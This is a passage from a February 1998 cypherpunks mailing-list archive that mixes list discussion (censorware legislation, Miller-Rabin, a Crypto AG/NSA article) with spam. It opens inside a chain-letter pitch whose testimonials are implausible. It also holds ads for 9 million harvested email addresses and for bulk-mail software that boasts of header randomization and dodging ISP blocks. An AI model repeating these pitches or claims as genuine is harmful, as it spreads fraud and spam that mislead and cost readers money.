to the income you will generate from this business!

      ***************************************
        T  E  S  T  I  M  O  N  I  A  L  S  
      ***************************************

   This program does work, but you must follow it EXACTLY!
Especially the rule of not trying to place your name in a 
different position, it won't work and you'll lose a lot of 
potential income.  I'm living proof that it works.  It 
is a great opportunity to make very easy money, with little
investment.  If you participate, follow the program exactly
and you'll be on your way to financial security.
          Sean McLaughlin, Jackson, MS

     My name is Frank. My wife, Doris, and I live in 
Bel-Air, MD. I am a cost accountant with a major U.S. 
Corporation and I make pretty good money. When I received 
the program I grumbled to Doris about "junk mail." I made 
fun of the whole thing, spouting my knowledge of the 
population and percentages involved.  I "knew" it wouldn't 
work. Doris totally ignored my supposed intelligence and 
jumped in with both feet. I made merciless fun of her, and 
was ready to lay the old "I told you so" on her when the 
thing didn't work... well, the laugh was on me!  Within 
two weeks she had received over 50 responses. Within 45 
days she had received over $147,200 in $5 bills! I was 
shocked!  I was sure that I had it all figured and that it
wouldn't work.  I AM a believer now. I have joined Doris in
her "hobby."   I did have seven more years until retirement,
but I think of the "rat race" and it's not for me. We owe it
all to MLM.
           Frank T., Bel-Air, MD

    The main reason for this letter is to tell you that 
this system is honest, lawful, extremely profitable, and is
a way to get a large amount of money in a short time. I was
approached several times before I checked this out. I 
joined just to see what one could expect in return for the
minimal effort and money required.  To my astonishment, I 
received $36,470.00 in the first 14 weeks, with money still
coming in.
           Sincerely yours, Phillip A. Brown, Esq.

    Not being the gambling type, it took me several weeks
to make up my mind to participate in this plan. But being 
conservative, I decided that the initial investment was so 
little that there was no way that I wouldn't get enough 
orders to at least get my money back. Boy, was I surprised
when I found my medium-size post office box crammed with 
orders!  For awhile, it got so overloaded that I had to 
start picking up my mail at the window. I'll make more 
money this year than any 10 years of my life before. There 
simply isn't a better investment with a faster return.
         Mary Rockland, Lansing, MI

This is my third time to participate in this plan. My 
wife and I have quit our jobs, and will soon buy a home at 
the beach and live off the interest on our money.  The 
only way this plan will work for you is if you do it. For 
your sake, and for your family's sake don't pass up this 
opportunity.  Good luck and happy spending!
           Charles Fairchild, Spokane, WA

          $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $
           ORDER YOUR REPORTS TODAY AND GET  
                STARTED ON YOUR ROAD TO   
                   FINANCIAL FREEDOM!!!   
          $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Sun, 15 Feb 1998 14:26:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship of Library and School Computers
In-Reply-To: <34E09296.3EC@dc.net>
Message-ID: <3.0.5.32.19980215112911.008d9b10@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Sounds like an obvious target for activism to add a requirement that
any censorware systems selected be clearly identified to the public,
including the kids, and that the blocking criteria and lists be
made available to the parents and adult library users.
In particular, many local jurisdictions have sunshine laws that
might have applicability, and anything so blatantly Un-American 
and dangerous as third-party censorship certainly needs to be watched.

On the legal side, the idea of a Federal mandate that state and local
jurisdictions make decisions that cannot be reviewed by the Feds
seems pretty dodgy; certainly the whole issue ought to be reviewable
by courts in response to a citizen lawsuit, even if Federal prosecutors
can't initiate actions about it.

At 09:47 AM 2/10/98 -0800, Robert Cannon wrote to CYBERIA-L@LISTSERV.AOL.COM,
>Sen. McCain has introduced his bill to require schools and libraries
>that acquire Internet access using the universal service fund to
>restrict the access of children to indecency.  The text of the Bill can
>be found at ftp://ftp.loc.gov/pub/thomas/c105/s1619.is.txt  It already
>has three cosponsors, one of which is our friend Dan "no I wont give up"
>Coats.

[Quotes from text of bill about how schools and libraries need systems
to block material "deemed to be inappropriate for minors";
schools have to select and promise to install to request the money,
while libraries have to employ it on one or more computers,
though the language appears to be crafted sufficiently vaguely
as to not require them to use it on all their computers 
(or even necessarily on computers accessible to kids :-) ]

>       `(4) LOCAL DETERMINATION OF CONTENT- For purposes of
>        paragraphs (2) and (3), the determination of what matter is
>        inappropriate for minors shall be made by the school, school
>        board, library or other authority responsible for making the
>        required certification. No agency or instrumentality of the
>        United States Government may--
>           `(A) establish criteria for making that determination;
>           `(B) review the determination made by the certifying
>            school, school board, library, or other authority; or
>           `(C) consider the criteria employed by the certifying
>            school, school board, library, or other authority in the
>            administration of subsection (h)(1)(B).'.
>
>
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vcarlos35@juno.com
Date: Sun, 15 Feb 1998 14:42:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Miller-Rabin prime number testing
Message-ID: <19980215.173857.7286.1.vcarlos35@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have any information on the Miller-Rabin probabalistic
primality test?
I'm pretty sure its on page 260 of Applied Cryptography 2nd edition, but
I lent mey copy  to
someone and he's away.
Please email me/the list if you have this algorithm.
Thanks.

_____________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 15 Feb 1998 09:42:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: re: Hlep
Message-ID: <199802151742.SAA10972@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



A cloud of linear purity began to move over the 
sand-monster, billowing with precipitory anticipation.

Small blood puzzles aligned themselves like 
melanomas, forming patterns of infinite finality.

The puzzle-monsters coalesced as lasers, carving
lesions from flesh and riddling the brittle skin
with xray cracks.

Soon it would be as it before, finally.


- A'Tak A'Tdorn






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 15 Feb 1998 16:09:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Spy Touts Crypto
Message-ID: <1.5.4.32.19980216001226.007560b0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Sun, 15 Feb 1998 16:40:04 -0500

Frankfurt, Germany (AP) -- Germany's spy chief has denied U.S. 
allegations that his agents spy on American companies, but he 
warned German firms that such economic espionage is soaring 
internationally. 

Bernd Schmidbauer said in comments published Saturday that, in 
contrast to most countries' spy agencies, Germany's is not 
involved in any economic espionage. 

The Frankfurter Allgemeine daily reported that the FBI last 
month accused Germany of running a post near Frankfurt that 
eavesdrops on U.S. phones and tries to break into American 
computer systems. 

"We're astounded about those reports from the FBI," the 
newspaper quoted Schmidbauer as saying. He said the post is 
involved only in trying to prevent the spread of weapons of 
mass destruction. 

The FBI does not normally identify governments it suspects of 
economic spying. But an article last month, written by an FBI 
agent for the industry magazine Public Administration Review, 
lists Germany along with France, Israel, China and South Korea 
as major offenders. 

The article said more than 700 investigations involving 
economic espionage by foreign governments are pending before 
the bureau. The FBI confirmed that figure last month. 

The American Society for Industrial Security estimated that 
American businesses lost $300 billion in intellectual property 
to foreign and domestic spies last year. 

Schmidbauer said German companies also are increasingly 
targeted, and warned that any conversations, faxes or computer 
information carried over phone lines or mobile phones could be 
eavesdropped. 

"A lot of money is being lost through this form of espionage," 
Schmidbauer said, without giving a figure. "And it's not only 
east European spies that are snapping up know-how from German 
companies."

"Our companies are relatively naive," he said. "Concrete steps 
must be taken ... including encoding techniques."

[End]

Thanks to DN.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 15864623@splittmail.com
Date: Sun, 15 Feb 1998 06:04:56 -0800 (PST)
To: trade@liner.com
Subject: E-mail List Goldmine
Message-ID: <199702005.GAA00805@ihia.com>
MIME-Version: 1.0
Content-Type: text/plain



**********************************************************    
EUROPE, ASIA AND AUSTRALIA E-MAIL ADDRESS LIST FOR SALE 
*********************************************************

THE FIRST OF ITS KIND ON THE INTERNET!

Expand your business WORLDWIDE! Using the Power of E-mail addresses.

This is the first time on the Internet that you are being
offered with this kind of opportunity. Do not confine yourself only
in the North American region while you can reach the entire world
by just a click!

Would you like 9 Million Business e-mail address Delivered On CD?

I thought so!

Well now you can! Hi, My name is Timothy Perora. For over six months,
my partner, Suchai T.Sinskul and I have been working to make the 
cleanest, most unique list available on the internet. This list was 
gathered from many different methods, but one important criteria was 
that the list only contains names of people living or working in Asia 
Europe and Australia. These people are affluent, middle class and 
upper white collar personnel or owners of various business operation. 
They're people who have high-buying power, more than 90% hold an 
international credit card and of course, they are familiar with buying or 
selling any product, services or any other opportunities overseas! 
 
We are now proud to present to you this list!

The FRESHEST, CLEANEST list on the internet today! 

>>>>Answer these questions:

* Are you tired of being BLOCKED by providers in the US?
* Are you sick of UNDELIVERABLES?
* Are you noticing a lowering response rate due to market saturation for
people in the US?
* Do you hate FLAMERS and REVENGE EMAIL BOMBERS?
* Are you concerned about your reputation?
* Do you want to sell and expand your offering to other people outside 
the US with the same cost as you're doing for people in your country?
* ARE YOU JUST LOOKING FOR THE ANSWER?
* ARE YOU GOING TO EXPAND AND OFFER YOUR PRODUCTS, SERVICES, 
BUSINESS OPPORTUNITIES AND MANY OTHERS TO THE
HUGE, UNTAPPED PEOPLE WHO ARE EAGER TO JUMP INTO THE OPPORTUNITIES
THEY'VE NEVER BEEN OFFERED BEFORE?
 
Well, We have the solution. Here's what we have:

9 million e-mail addresses for people who live or work in Europe,
Australia and Asian countries. These are included:

456,780    names for people in Hong Kong
367,845    names for people in Singapore
225,678    names for people in Thailand
643,601    names for people in Taiwan
2,120,680  names for people in Japan
345,670    names for people in Korea
1,321,650  names for people in Australia
1,256,789  names for people in United Kingdom
1,076,500  names for people in Germany
417,000    names for people in Netherlands
255,900    names for people in Sweden
345,000    names for people in France
134,231    names for people in Switzerland
175,640    names for people in Italy
128,090    names for people in Spain
*********
9,271,054  names for the whole list!

YOU CAN BE ONE OF THE FIRST PEOPLE TO BENEFIT FROM THIS FRESHEST,
HUGE, UNTAPPED LIST EVER-TO-BE!

YOU'LL LOVE THE CRITERIA:

* more than 95% deliverable, and you know what!, these people won't
change their e-mail addresses as often as in the US! (In the US,
any list that is more than 90 days will be outdated, more than 50%
undeliverable!). You can keep this list for more than one year and
still be able to make at least 90% deliverable! Yes, it's absolutely 
true, We guarantee with our strong words!

**************************************************************************
AFTER ONE YEAR OF PURCHASE, IF THE LIST HAS MORE THAN 10% UNDELIVERABLES,
JUST LET US KNOW, AND WE'LL REFUND THE MONEY TO YOU!
**************************************************************************

This list is truly your invaluable goldmine. Profit from it time after 
time, year after year, people won't go away from their addresses.

They're waiting to buy your products, services, opportunities or anything
you're doing. What you need to add to your current offering is only the
international shipping cost, Just check it out, then you can start 
promoting immediately!
 
WHAT DOES THIS MEAN FOR YOU?

+ Expand your business to the huge, untapped part of the world without 
any additional cost
+ Less resources needed to process undeliverables and remove requests
+ Less complaints
+ Better reputation.
+ Much more positive responses per mailing
+ Much higher sales percentages
+ BIGGER PROFITS!
 
HOW MUCH DO YOU GET, AND HOW MUCH DOES IT COST?

If you are an experienced bulk emailer, then YOU KNOW THE VALUE OF GOOD
ADDRESSES.  If you are not an experienced bulk emailer, then you'll have 
to take our word for it...

"THE FRESHEST VALID EMAIL ADDRESSES ARE PURE *GOLD*"

Since sending email is so inexpensive, a good email list is all you 
need to reach your road to the entire world and make huge profit in the 
shortest time.

You can easily generate thousands of dollars in business in a couple 
of days...
 
Here's an offer to motivate you to act now...
 
7 DAYS INTRODUCTORY SPECIAL:

If you order within 7 days, you will get the whole 9 million names on CD
for a one time low cost of only $95! (from our normal price of $399).

IS THERE ANY GUARANTEE?

Yes, We guarantee:

1. the list is more than 95% deliverable at the time of purchase and
2. after one year of purchase, if the list has more than 10% 
undeliverables, just let us know, you'll get a full refund!

The file is completely duplicate checked and formatted one email address
per line.  It is compatible with all of the popular bulk email programs. 

The list was arranged as per the domain name and country, so that it can 
save your mass e-mailing time.

The following addreses also have been filtered: 
.mil, .gov, .edu, .org addresses
postmaster addresses - postmaster@
webmaster addresses - webmaster@

So, don't wait.  EXPAND YOUR BUSINESS TO THE WORLD now before your
competitors do!

Sincerely,

Timothy Perora

P.S.

1. Apart from the special introductory price, here's a Super Bonus for 
people who order within 7 days, 500,000 targeted e-mail addresses.
These addresses are all in the US and guaranteed more than 90% deliverable 
and only targeted for Business Opportunity seekers. It's just only 
updated on Jan.25-30, 1998. This list will be yours for free!

2. This special price and the Super Bonus have a 7 day expiration limit.  
We'll only sell to a limited number of people to control saturation levels.

                           Order now!
------------------------------------------------------------------------------
ORDER FORM:

Please print out this order form and then fill in the blanks...

_____ Yes!  I am ordering within 7 days, please send my whole list of
9 million e-mail addresses on CD-ROM for the price of $95, and include 
a list of 500,000 targeted US e-mail address as a Super Bonus. 

Important Note:

1.Payment should be made by international Bank Draft, 
or American Express traveller Cheque 
(no personal checks/money order)...and made payable to: 

" Mr.Suchai Techavorasinskul "

2.By sending cash, Please make sure that cash be wrapped
around with many fold of thick paper and sealed securely.
(if possible,wrapped it with carbon paper). Use the private
mail service such as UPS or Fedex to ensure fast delivery.
Many of our clients use this method because they are not
familiar with international banking process.

3.If you have any queries, please fax to our international office
at : (66 2) 8870458

Please fill in the following information and send along with 
your payment to:
_______________________________________________________________________

  Mr. Timothy Perora
  105/80 Puthamontol lane 2 road, Bangramard, Talingchan,
  Bangkok 10170,  Thailand
_______________________________________________________________________


DATE_________________________________________________________

YOUR NAME____________________________________________________
 
STREET ADDRESS_______________________________________________

CITY, STATE, ZIP_____________________________________________

PHONE NUMBERS________________________________________________

FAX NUMBERS__________________________________________________

EMAIL ADDRESSES______________________________________________

Your order will be shipped by first-class airmail.
Please allow up to 4 weeks for the material to arrive at its destination.
-------------------------------------------------------------------------------

 
 

 



 
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Sun, 15 Feb 1998 19:32:39 -0800 (PST)
To: j orlin grabbe <kalliste@aci.net>
Subject: Erich Mielke
Message-ID: <34E7AEE5.6FD9@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Sunday 2/15/98 7:52 PM

J Orlin Grabbe

Albuquerque Journal  h 2/5/98

  Ex-Spy Denied Extra Pension

    BERLIN - The former head of the East
  German secret police, a lifelong communist
  who fled Germany in the 1930s to avoid
  the Nazis, is not entitled to extra pension
  money for the time he spent in exile, a 
  court ruled Wednesday.
    One the No. 2 man in East Germany, Erich
  Mielke, 90, now lives in seclusion with his 
  wife in an apartment in eastern Berlin.  His
  monthly pension, according to German media,
  is just under $55 a month.
    Hoping to boost his income, he applied to Berlin
  authorities for a supplemental pension for the
  years he spent in Moscow and Spain, 1931 until 
  the end of  World War II.
    But the court ruled that the main reason for his
  exile was not fear of persecution, but for his 
  involvement as a young communist street fighter
  in the killing of two Berlin policemen on Aug. 9,
  1931.

Your attached article ALSO may include Mielke.

Grabbe, a LOT of guys wanted to find out what 
happened.  Israel too.

Let's all hope for settlement of this unfortunate
matter.

Later
bill

Title: NSA, Crypto AG, and the Iraq-Iran Conflict




 [Email Reply] 


NSA, Crypto AG, and the Iraq-Iran Conflict


          by J. Orlin Grabbe




	One of the dirty little secrets of the 1980s is that 
the U.S. regularly provided Iraq's Saddam Hussein with 
top-secret communication intercepts by the U.S. National 
Security Agency (NSA).  Consider the evidence.

	When in 1991 the government of Kuwait paid the 
public relations firm of Hill & Knowlton ten million 
dollars to drum up American war fever against the evil 
dictator Hussein, it brought about the end of a long legacy 
of cooperation between the U.S. and Iraq.  Hill & 
Knowlton resurrected the World War I propaganda story 
about German soldiers roasting Belgian babies on 
bayonets, updated in the form of a confidential witness 
(actually the daughter of the Kuwaiti ambassador to the 
U.S.) who told Congress a tearful story of Iraqi soldiers 
taking Kuwaiti babies out of incubators and leaving them 
on the cold floor to die.  President George Bush then 
repeated this fabricated tale in speeches ten times over the 
next three days.

	What is remarkable about this staged turn of 
events is that, until then, Hussein had operated largely 
with U.S. approval.  This cooperation had spanned three 
successive administrations, starting with Jimmy Carter.  
As noted by John R. MacArthur, "From 1980 to 1988, 
Hussein had shouldered the burden of killing about 
150,000 Iranians, in addition to at least thirteen thousand 
of his own citizens, including several thousand unarmed 
Kurdish civilians, and in the process won the admiration 
and support of elements of three successive U.S. 
Administrations" [1].

	Hussein's artful slaughter of Iranians was aided by 
good military intelligence.  The role of NSA in the 
conflict is an open secret in Europe, the Middle East, and 
Asia.  Only in this country has there been a relative news 
blackout, despite the fact that it was the U.S. 
administration that let the crypto cat out of the bag.  

	First, U.S. President Ronald Reagan informed the 
world on national television that the United States was 
reading Libyan communications.  This admission was part 
of a speech justifying the retaliatory bombing of Libya for 
its alleged involvement in the La Belle discotheque 
bombing in Berlin's Schoeneberg district, where two U.S. 
soldiers and a Turkish woman were killed, and 200 others 
injured. Reagan wasn't talking about American 
monitoring of Libyan news broadcasts. Rather, his "direct, 
precise, and undeniable proof"  referred to secret 
(encrypted) diplomatic communication between Tripoli 
and the Libyan embassy in East Berlin.

	Next, this leak was compound by the U.S. 
demonstration that it was also reading secret Iranian 
communications.  As reported in Switzerland's Neue 
Zurcher Zeitung,  the U.S. provided the contents of 
encrypted Iranian messages to France to assist in the 
conviction of Ali Vakili Rad and Massoud Hendi for the 
stabbing death in the Paris suburb of Suresnes of the 
former Iranian prime minister Shahpour Bakhtiar and his 
personal secretary Katibeh Fallouch. [2]
 
	What these two countries had in common was they 
had both purchased cryptographic communication 
equipment from the Swiss firm Crypto AG. Crypto AG 
was founded in 1952 by the (Russian-born) Swedish 
cryptographer Boris Hagelin who located his company in  
Zug.  Boris had created the "Hagelin-machine", a 
encryption device similar to the German "Enigma".  The 
Hagelin machine was used on the side of the Allies in 
World War II.

	Crypto AG was an old and venerable firm, and 
Switzerland was a neutral country. So Crypto AG's 
enciphering devices for voice communication and digital 
data networks were popular, and customers came from 
130 countries. These included the Vatican, as well the 
governments of Iraq, Iran, and Libya.  Such countries 
were naturally skeptical of cryptographic devices sold in 
many NATO countries, so turned to relatively neutral 
Switzerland for communication security.

	Iran demonstrated its suspicion about the source of 
the leaks, when it arrested Hans Buehler, a top salesman 
for Crypto AG, in Teheran on March 18, 1992.  During 
his nine and a half months of solitary confinement in Evin 
prison in Teheran, Buehler was questioned again and 
again whether he had leaked Teheran's codes or Libya's 
keys to Western powers.  Luckily Buehler didn't know 
anything.  He in fact believed in his own sales pitch that 
Crypto AG was a neutral company and its equipment was 
the best.  They were Swiss, after all.  [3]

	Crypto AG eventually paid one million dollars for 
Buehler's release in January 1993, then promptly fired 
him once they had reassured themselves that he hadn't 
revealed anything important under interrogation, and 
because Buehler had begun to ask some embarrassing 
questions. Then reports appeared on Swiss television, 
Swiss Radio International, all the major Swiss papers, and 
in German magazines like Der Spiegel.  Had Crypto AG's 
equipment been spiked by Western intelligence services? 
the media wanted to know. The answer was Yes [4].

	 Swiss television traced the ownership of Crypto 
AG to a company in Liechtenstein, and from there back to 
a trust company in Munich. A witness appearing on Swiss 
television explained the real owner was the German 
government--the Federal Estates Administration. [5]

        According to Der Spiegel, all but 6 of the 6000 
shares of Crypto AG were at one time owned by Eugen 
Freiberger, who resided in Munich and was head of the 
Crypto AG managing board in 1982. Another German, 
Josef Bauer, an authorized tax agent of the Muenchner 
Treuhandgesellschaft KPMG, and who was elected to the 
managing board in 1970, stated that his mandate had 
come from the German company Siemens.  Other 
members of Crypto AG's management had also worked at 
Siemens. Was the German secret service, the 
Bundesnachrichtendienst (BND), hiding behind the 
Siemens' connection?

        So it would seem.  Der Spiegel reported that in 
October 1970, a secret meeting of the BND had discussed 
how the Swiss company Graettner could be guided into 
closer cooperation with Crypto AG, or could even merged 
with it. The BND additionally considered how "the 
Swedish company Ericsson could be influenced through 
Siemens to terminate its own cryptographic business." [6]

	A former employee of Crypto AG reported that he 
had to coordinate his developments with "people from 
Bad Godesberg". This was the location of the "central 
office for encryption affairs" of the BND, and the service 
instructed Crypto AG what algorithms to use to create the 
codes.  The employee also remembers an American 
"watcher", who strongly demanded the use of certain 
encryption methods.

	Representatives from NSA visited Crypto AG 
often. A memorandum of  a secret workshop at Crypto 
AG in August 1975, where a new prototype of an 
encryption device was demonstrated, mentions the 
participation of Nora L. Mackebee, an NSA 
cryptographer. Motorola engineer Bob Newman says that 
Mackebee was introduced to him as a "consultant".  
Motorola cooperated with Crypto AG in the seventies in 
developing a new generation of electronic encryption 
machines.   The Americans "knew Zug very well and gave 
travel tips to the Motorola people for the visit at Crypto 
AG," Newman told Der Spiegel.

	Knowledgeable sources indicate that the Crypto 
AG enciphering process, developed in cooperation with 
the NSA and the German company Siemans, involved 
secretly embedding the decryption key in the cipher text.  
Those who knew where to look could monitor the 
encrypted communication, then extract the decryption key 
that was also part of the transmission, and recover the 
plain text message.  Decryption of a message by a 
knowledgeable third party was not any more difficult than
it was for the intended receiver.  (More than one method 
was used.  Sometimes the algorithm was simply deficient, 
with built-in exploitable weaknesses.)

	Crypto AG denies all this, of course, saying such 
reports are ""pure invention".

	What information was provided to Saddam 
Hussein exactly?  Answers to this question are currently 
being sought in a lawsuit against NSA in New Mexico, 
which has asked to see "all Iranian messages and 
translations between January 1, 1980 and June 10, 1996". 
[7]

	The passage of top-secret communications 
intelligence to someone like Saddam Hussein brings up 
other questions.  Which dictator is the U.S. passing top 
secret messages to currently?  Jiang Zemin?  Boris 
Yeltsin?  

	Will Saddam Hussein again become a recipient of 
NSA largess if he returns to the mass slaughter of 
Iranians?  What exactly is the purpose of NSA anyway?

	One more question:  Who is reading the Pope's 
communications?


Bibliography

[1] John R. MacArthur, Second Front: Censorship and 
Propaganda in the Gulf War, Hill and Wang, New York, 
1992.

[2] Some of the background of this assassination can be 
found in "The Tehran Connection," Time Magazine, 
March 21, 1994.

[3] The Buehler case is detailed in Res Strehle, 
Verschleusselt: der Fall Hans Beuhler, Werd Verlag, 
Zurich, 1994.  

[4] "For years, NSA secretly rigged Crypto AG machines 
so that U.S. eavesdroppers could easily break their codes, 
according to former company employees whose story is 
supported by company documents,"  "No Such Agency, 
Part 4: Rigging the Game," The Baltimore Sun, December 
4, 1995.

[5] Reported in programs about the Buehler case that were 
broadcast on Swiss Radio International on May 15, 1994 
and July 18, 1994.

[6]  "Wer ist der befugte Vierte?":  Geheimdienste 
unterwandern den Schutz von Verschlusselungsgeraten," 
Der Spiegel 36, 1996.

[7] U.S. District Court for the District of New Mexico, 
William H. Payne, Arthur R. Morales, Plaintiffs, v. 
Lieutenant General Kenneth A. Minihan, USAF, Director 
of National Security Agency, National Security Agency, 
Defendant, CIV NO 97 0266 SC/DJS.

November 2, 1997
Web Page: http://www.aci.net/kalliste/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 89485650@cts.com
Date: Sun, 15 Feb 1998 21:11:59 -0800 (PST)
To: Friend@public.com
Subject: Pre- approved Guaranteed Merchant Accounts ! !
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>

                    INCREASE YOUR SALES! !
ACCEPT  CREDIT CARDS! PRE-APPROVED APPLICATION
 Good Credit/Bad Credit/No Credit NO APPLICATION FEES

 For a Limited Time Only!!! Regular $195.00 Application Fee Waived
For This   Offer!!! PLUS FREE SET-UP FOR ACCEPTING
               CHECKS  BY FAX OR BY PHONE

  Increase Your Business By 30% to 100% Just By Accepting Credit Cards
        We Specialize in Home Based Businesses - APPLY TODAY!!!
         Accept Visa, Mastercard,  American Express, and  Discover!

 If you are interested in the merchant account please call:   (800) 400-8532
  24 HRS A DAY 7 DAYS A WEEK PLEASE LEAVE YOUR NAME, NUMBER,
  AND THE BEST TIME TO CALL YOU. Please be sure to include your source code
          CJK2929-WRN04  to ensure that your application fee is waived.
************************************************************************************************
           This  Pre-Approved  Merchant  Account Application  has
              NO  APPLICATION FEES!! This is a one time mailing.



------------------------------------------------------------------------------------------------------------------------------


 


</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Sun, 15 Feb 1998 11:51:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Q
Message-ID: <199802151945.UAA25905@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


>Whats up?

Fuck off.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Sun, 15 Feb 1998 22:11:16 -0800 (PST)
To: vcarlos35@juno.com
Subject: Re: Miller-Rabin prime number testing
In-Reply-To: <19980215.173857.7286.1.vcarlos35@juno.com>
Message-ID: <Pine.SOL.3.96.980216011007.20304D-100000@c00069-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Feb 1998 vcarlos35@juno.com wrote:

>Does anyone have any information on the Miller-Rabin probabalistic
>primality test?
>I'm pretty sure its on page 260 of Applied Cryptography 2nd edition, but
>I lent mey copy  to
>someone and he's away.
>Please email me/the list if you have this algorithm.
>Thanks.
>

http://www.altavista.digital.com/cgi-bin/query?pg=q&what=web&kl=XX&q=%22Miller-Rabin%22

83 documents match your query.

TATTOOMAN

/--------------------------[   TATTOOMAN   ]--------------------------\
| ORG: NC State Computer Science Dept    VP of The  E. H. A. P. Corp. |
| EML: jkwilli2@adm.csc.ncsu.edu         ehap@hackers.com             |
| EML: jkwilli2@unity.ncsu.edu           ehap-secure@hackers.com      |
| WWW: http://www4.ncsu.edu/~jkwilli2/   http://www.hackers.com/ehap/ |
| FTP: ftp://152.7.11.38/pub/personal/tattooman/                      |
| W3B: http://152.7.11.38/~tattooman/w3board/                         |
| PGP: finger tattooman@152.7.11.38                                   |
\----------------[   http://152.7.11.38/~tattooman/  ]----------------/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks
Date: Mon, 16 Feb 1998 02:39:18 -0800 (PST)
Subject: Turn Your Computer Into a Personal Mail Server
Message-ID: <199802161039.CAA05722@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Look at the Headers in this Message.
If you like what you see read on.

This message was sent to you courtesy of the amazing new technology of  the "Rapid Fire 
Mail Server" (RFMS).  RFMS transforms your computer into a personal mail server.  With no 
additional hardware, RFMS software will give you complete control of  your mailings, because 
the mail you send will originate from your computer and be delivered directly into the mailbox 
of your recipient.  Since the mail originates from your computer, it is no longer necessary to 
use your Internet Service Provider's mail server.

When you use the previous generation stealth or cloaking type programs, they work by 
uploading your mail to your provider's mail server.  They can also be programmed to send 
mail through other providers mail servers without authorization (this is considered theft of service).  
The problem is, the previous generation stealth type programs upload the messages faster than 
these mail servers can process them. 

Many times this causes a provider's mail server to bog down and crash.  Obviously, this will make 
providers furious with you.  Furthermore, you may think that you are sending hundreds of thousands 
of messages, unfortunately, most of it simply gets filtered and deleted by the mail server.  You are 
lucky to get 10%-20% of that mail delivered.  With Rapid Fire Mail Server software YOUR computer 
emulates a mail server and YOU actually control and watch all your mail being delivered piece by 
piece. There is a 100% delivery rate with this program anywhere on the internet. We did say 100% 
delivery rate to any internet email addresses. A bold claim but it is true.  This is the latest technical 
advance in bulk email since the advent of the stealth type programs.  

This program verifies domains and validity of email addresses before sending mail. This 
dramatically reduces your bounced back undeliverables. Bounced back undeliverables 
can sure bog down a server. You can also control where you want any bounced back 
mail to go. It can go to any email address you want with Rapid Fire Mail Server.  

Rapid Fire Mail Server can work with ANY dial up internet account, an ISDN line or a T-1 or T-3. 
It runs on Windows 95 or NT.

We have not heard of any person losing a dial up account with this software. One reason 
bulk email is so frowned upon with numerous ISP's is people try to send as much mail 
as they can, as quick as they can and crash the mail server of the ISP. This won't happen 
with Rapid Fire Mail Server software since you don't use the mail server of the ISP to 
send your mail. The program actually sends the mail directly from your computer which 
is now a bona fide mail server, to the recipients mail server avoiding any potential blocks 
that would prevent you from reaching those on your mailing list. You do not have to
"forge" headers or randomize anything to have 100% of your mail delivered, although 
the program does allow for randomization and customizing of headers. You can send
mail omitting the "to" "from" and "reply to" portions of your headers.   

Want to send out your messages in color. Not a problem with Rapid Fire Mail Server. Just 
select a font color with your mouse, and then click on a background color as well. Want to 
make your font bold or put it into italics, just point and click. Want your message centered or 
shifted left or right, once again just point and click.

Rapid Fire Mail Server works with any Windows 95 or NT computer. It requires no additional 
hardware or software.

The Rapid Fire Mail Server sends at speeds up to 80,000 messages per hour DELIVERED using 
a modest pentium and a 28.8 modem. Rates will dramatically increase with an ISDN or cable 
modem and of course with a T-1 they will be even faster. 

If you want to take advantage of this breakthrough in Bulk EMail Technology give us a 
call. Oh, if you were wondering the program costs $700.  We don't plan on repeat 
mailings for this product. If you think the price is too high, well we can sell you Stealth for 
$200. You might be happy with Stealth if you don't mind frequent loss of dial-up accounts, 
a lot of complaints, not getting a lot of your mail delivered due to blocks and crashed mail s
ervers deleting your mail, along with the resulting low response rate from your mailings, 
then stealth would probably make you happy. LOL

Call us at 1-612-557-0034
for more info and ordering info.  
So give us a call today.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 16 Feb 1998 14:30:30 -0800 (PST)
To: Ken Williams <jkwilli2@unity.ncsu.edu>
Subject: Re: bugged?
In-Reply-To: <Pine.SOL.3.96.980216061644.7638A-100000@c00953-100lez.eos.ncsu.edu>
Message-ID: <Pine.BSF.3.91.980216031531.21411B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



His ISP has probably switched to 56K-capable modems. This sounds like a 
recognition tone (a low "brrrrp" sound).

